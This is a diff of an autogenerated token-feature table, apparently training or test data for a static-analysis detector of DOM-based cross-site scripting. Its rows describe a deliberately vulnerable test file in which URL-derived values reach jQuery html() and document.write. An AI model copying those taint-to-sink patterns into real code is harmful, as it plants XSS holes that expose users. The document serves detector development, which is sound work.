    ' | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -15965,12 +111910,32 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:12:37:12:42 | 'px">' | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/tst.js:12:37:12:42 | 'px">' | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:12:37:12:42 | 'px">' | stringConcatenatedWith | '
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:14:3:14:3 | $ | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:14:3:14:3 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:14:3:14:44 | $('
    ') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:14:3:14:44 | $('
    ') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:14:3:14:44 | $('
    ') | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:14:3:14:44 | $('
    ') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:14:3:14:44 | $('
    ') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:14:3:14:44 | exceptional return of $('
    ') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:14:3:14:44 | exceptional return of $('
    ') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:14:3:14:44 | exceptional return of $('
    ') | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:14:3:14:44 | exceptional return of $('
    ') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:14:3:14:44 | exceptional return of $('
    ') | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:14:5:14:24 | '
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | | autogenerated/Xss/DomBasedXss/tst.js:14:5:14:24 | '
    ' | +| autogenerated/Xss/DomBasedXss/tst.js:14:5:14:34 | '
    document location href substring document location href indexOf default= 8 document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:14:5:14:34 | '
    ' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:14:5:14:43 | '
    ' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:14:5:14:43 | '
    ' | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -15984,18 +111949,43 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:14:28:14:34 | +target | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/tst.js:14:28:14:34 | +target | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:14:28:14:34 | +target | stringConcatenatedWith | '
    ' | +| autogenerated/Xss/DomBasedXss/tst.js:14:29:14:34 | target | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:14:29:14:34 | target | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:14:29:14:34 | target | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:14:29:14:34 | target | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:14:29:14:34 | target | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:14:38:14:43 | 'px">' | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | | autogenerated/Xss/DomBasedXss/tst.js:14:38:14:43 | 'px">' | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/tst.js:14:38:14:43 | 'px">' | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | | autogenerated/Xss/DomBasedXss/tst.js:14:38:14:43 | 'px">' | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/tst.js:14:38:14:43 | 'px">' | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:14:38:14:43 | 'px">' | stringConcatenatedWith | '
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:15:3:15:3 | $ | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:15:3:15:3 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:15:3:15:53 | $('
    ') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:15:3:15:53 | $('
    ') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:15:3:15:53 | $('
    ') | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:15:3:15:53 | $('
    ') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:15:3:15:53 | $('
    ') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:15:3:15:53 | exceptional return of $('
    ') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:15:3:15:53 | exceptional return of $('
    ') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:15:3:15:53 | exceptional return of $('
    ') | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:15:3:15:53 | exceptional return of $('
    ') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:15:3:15:53 | exceptional return of $('
    ') | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:15:5:15:24 | '
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | | autogenerated/Xss/DomBasedXss/tst.js:15:5:15:24 | '
    ' | +| autogenerated/Xss/DomBasedXss/tst.js:15:5:15:43 | '
    document location href substring document location href indexOf default= 8 document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:15:5:15:43 | '
    ' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:15:5:15:52 | '
    ' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:15:5:15:52 | '
    ' | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16003,6 +111993,16 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:15:5:15:52 | '
    ' | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | | autogenerated/Xss/DomBasedXss/tst.js:15:5:15:52 | '
    ' | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/tst.js:15:5:15:52 | '
    ' | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:15:28:15:35 | parseInt | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:15:28:15:35 | parseInt | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:15:28:15:35 | parseInt | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:15:28:15:35 | parseInt | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:15:28:15:35 | parseInt | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:15:28:15:43 | exceptional return of parseInt(target) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:15:28:15:43 | exceptional return of parseInt(target) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:15:28:15:43 | exceptional return of parseInt(target) | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:15:28:15:43 | exceptional return of parseInt(target) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:15:28:15:43 | exceptional return of parseInt(target) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:15:28:15:43 | parseInt(target) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | | autogenerated/Xss/DomBasedXss/tst.js:15:28:15:43 | parseInt(target) | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/tst.js:15:28:15:43 | parseInt(target) | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | @@ -16022,6 +112022,98 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:15:47:15:52 | 'px">' | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/tst.js:15:47:15:52 | 'px">' | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:15:47:15:52 | 'px">' | stringConcatenatedWith | '
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:17:7:17:12 | params | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:17:7:17:12 | params | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:17:7:17:56 | params | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:17:7:17:56 | params | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:17:7:17:56 | params | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:17:7:17:56 | params | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:17:7:17:56 | params | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:17:7:17:56 | params ... hParams | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:17:7:17:56 | params ... hParams | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:17:7:17:56 | params ... hParams | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:17:7:17:56 | params ... hParams | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:17:7:17:56 | params ... hParams | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:17:16:17:43 | (new UR ... ation)) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:17:16:17:43 | (new UR ... ation)) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:17:16:17:43 | (new UR ... ation)) | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:17:16:17:43 | (new UR ... ation)) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:17:16:17:43 | (new UR ... ation)) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:17:16:17:56 | (new UR ... hParams | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:17:16:17:56 | (new UR ... hParams | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:17:16:17:56 | (new UR ... hParams | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:17:16:17:56 | (new UR ... hParams | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:17:16:17:56 | (new UR ... hParams | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:17:17:17:42 | exceptional return of new URL ... cation) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:17:17:17:42 | exceptional return of new URL ... cation) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:17:17:17:42 | exceptional return of new URL ... cation) | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:17:17:17:42 | exceptional return of new URL ... cation) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:17:17:17:42 | exceptional return of new URL ... cation) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:17:17:17:42 | new URL ... cation) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:17:17:17:42 | new URL ... cation) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:17:17:17:42 | new URL ... cation) | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:17:17:17:42 | new URL ... cation) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:17:17:17:42 | new URL ... cation) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:17:21:17:23 | URL | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:17:21:17:23 | URL | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:17:21:17:23 | URL | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:17:21:17:23 | URL | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:17:21:17:23 | URL | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:17:25:17:32 | document | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:17:25:17:32 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:17:25:17:32 | document | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
